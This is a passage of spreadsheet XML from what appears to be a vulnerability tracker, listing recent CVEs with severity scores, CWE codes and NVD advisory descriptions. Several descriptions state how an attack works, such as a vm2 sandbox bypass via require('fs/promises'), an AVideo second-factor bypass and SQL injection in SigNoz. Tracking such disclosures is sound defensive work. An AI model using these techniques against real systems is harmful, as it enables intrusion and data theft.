      </c>
      <c r="D98" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr"/>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>InternLM LMDeploy through 0.17.0 contains a reachable assertion vulnerability in the DistServe decode migration loop that allows unauthenticated attackers to terminate the inference engine. Attackers can submit a migration_request with an empty remote_block_ids list to trigger an AssertionError that crashes the engine loop and causes subsequent inference requests to fail.</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92971</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92987</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t>roxmltree through 0.21.1 performs quadratic-time attribute and namespace validation during XML parsing without limits on attribute count. Attackers can craft XML documents with tens of thousands of attributes on a single element to consume excessive CPU time and cause denial of service.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92987</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19477</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>security@ni.com</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>There
is stack-based buffer overflow vulnerability recently discovered in MCC Universal Library for Linux (uldaq).  This may result in information disclosure or arbitrary code
execution. This vulnerability affects MCC Universal Library for Linux (uldaq) v1.2.1
and prior versions.</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19477</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68791</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr"/>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Azure Machine Learning allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68791</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87963</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr"/>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>The Yo WordPress plugin from 1.1 through 1.3.1 does not sanitize or parameterize the username request parameter before using it in a SQL query, and reads it before WordPress applies its request escaping, allowing unauthenticated attackers to perform SQL injection and read arbitrary database contents including administrator password hashes.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87963</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92914</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr"/>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>AVideo LoginControl contains an authentication bypass vulnerability in the PGP second factor verification that compares challenge responses using loose equality against an uninitialized session variable. Attackers with a victim's password can bypass the second factor by sending a parameter-less GET request to verifyChallenge.json.php, which evaluates null == null and marks authentication complete.</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92914</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92954</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>vm2 is a sandbox library for running untrusted JavaScript in Node.js. In versions &gt;= 3.10.0 and &lt;= 3.11.7, Promises returned from the host realm into the sandbox are not marked as handled at the bridge boundary; only Promises created inside the sandbox are wrapped with a rejection-swallowing handler (lib/setup-sandbox.js), and the bridge only installs host-side rejection sanitizers when sandbox code calls .then/.catch/.finally. As a result, code running in the sandbox can invoke a host function that returns a rejected Promise (for example events.once() exposed via the NodeVM events builtin, or any embedder-provided Promise-returning API) and simply ignore the return value, leaving the host Promise unhandled so that Node.js's default unhandled-rejection behavior terminates the host process. This is an incomplete fix of GHSA-hw58-p9xv-2mjh. The issue is fixed in version 3.11.8.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92954</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92985</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>8.6</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2026-09-17</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before 3.8.4 fail to escape bookmark labels imported from notebook files when rendering them in the dock tree. Attackers can craft malicious .sy notebook files with unescaped HTML in bookmark attributes that execute scripts in the Electron renderer with access to child_process for command execution.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92985</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92986</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>SiYuan before 3.8.4 renders document titles as HTML in the backlink dock tree without escaping markup characters. Attackers can set malicious titles through the rename API or crafted notebooks to execute scripts in the Electron renderer with access to child_process for command execution.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92986</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66580</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr"/>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>Contributor SQL Injection in Product Feed Manager &lt;= 7.12.0 versions.</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66580</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71538</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr">
        <is>
          <t>npm:@cyclonedx/cyclonedx-npm</t>
        </is>
      </c>
      <c r="M108" s="5" t="inlineStr">
        <is>
          <t>6.0.0</t>
        </is>
      </c>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>@cyclonedx/cyclonedx-npm creates CycloneDX Software Bill of Materials from npm projects. Prior to version 6.0.0, the Windows fallback path in src/npmRunner.ts, used when npm_execpath does not provide the npm CLI path, can construct a shell command containing an untrusted value from the --workspace option. When an attacker can influence that option and the fallback npm execution path is reached, shell metacharacters in the workspace value can execute arbitrary operating-system commands with the privileges of the user running the CLI, allowing data access, file modification, or service disruption. This issue is fixed in version 6.0.0.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71538</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92958</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr"/>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>vm2 through 3.11.6 contains a builtin-module denylist bypass in NodeVM. When the embedder uses the builtin wildcard together with negative entries (e.g. require: { builtin: ['*', '-fs', '-child_process'] }), negative entries are matched by exact module name in lib/builtin.js, so -fs removes only the builtin named fs and does not remove builtin subpaths such as fs/promises. Sandboxed code can therefore call require('fs/promises') or require('node:fs/promises') and reach the promise-based filesystem API despite fs being denied; node: prefix handling is likewise inconsistent (a -node:fs/promises entry does not block require('fs/promises')). Host file creation and writing were confirmed via fsp.writeFile(), and other fs/promises operations (cp, mkdir, rename, rm, rmdir, truncate, read operations, etc.) are also reachable. This issue is fixed in vm2 3.11.7.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92958</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93292</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr"/>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>SigNoz versions from 0.88.0 before 0.142.1 contain a SQL injection vulnerability in trace-funnel analytics endpoints that interpolate service_name and span_name fields into ClickHouse string literals without escaping. Authenticated attackers can inject SQL through funnel step definitions to execute arbitrary queries and read results in HTTP responses.</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93292</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93426</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="inlineStr"/>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr"/>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>SigNoz versions 0.87.0 before 0.142.0 fail to escape user-supplied telemetry field-key names in the v5 query_range API, allowing authenticated users to inject SQL. Attackers with Viewer role or higher can embed backticks and quotes in field names to break out of identifiers and string literals, executing arbitrary ClickHouse SQL to read system tables and exfiltrate data.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93426</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54507</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr"/>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.5, the oEmbedProxy() handler in admin/controller/editor/editor.php accepts an attacker-controlled url parameter and passes it to getUrl(), while validateUrl() in system/functions.php checks only the hostname string and does not validate its resolved addresses. An authenticated admin-panel user with editor/* permission can invoke GET /admin/index.php?module=editor/editor&amp;action=oEmbedProxy with a dotted hostname or normalized loopback form that resolves to a private, loopback, link-local, or reserved address, causing the server to issue an HTTP or HTTPS request and return the response body. Storefront users and anonymous visitors cannot invoke the endpoint, but no CSRF token is required because the action uses GET. This can disclose internal service responses or cloud instance metadata and associated credentials. This issue is fixed in version 1.0.8.5.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54507</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55062</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr"/>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-23, CWE-36, CWE-73</t>
        </is>
      </c>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>uniget is a universal installer and updater for (container) tools. Prior to 0.27.6, the hooks edit command in cmd/uniget/hooks.go concatenates an unvalidated hook filename with the selected hooks directory, allowing parent-directory components to escape that directory. The resulting path is passed to the configured editor, which can access or modify files outside the hooks directory with the privileges of the uniget process account. This issue is fixed in version 0.27.6.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55062</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54580</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
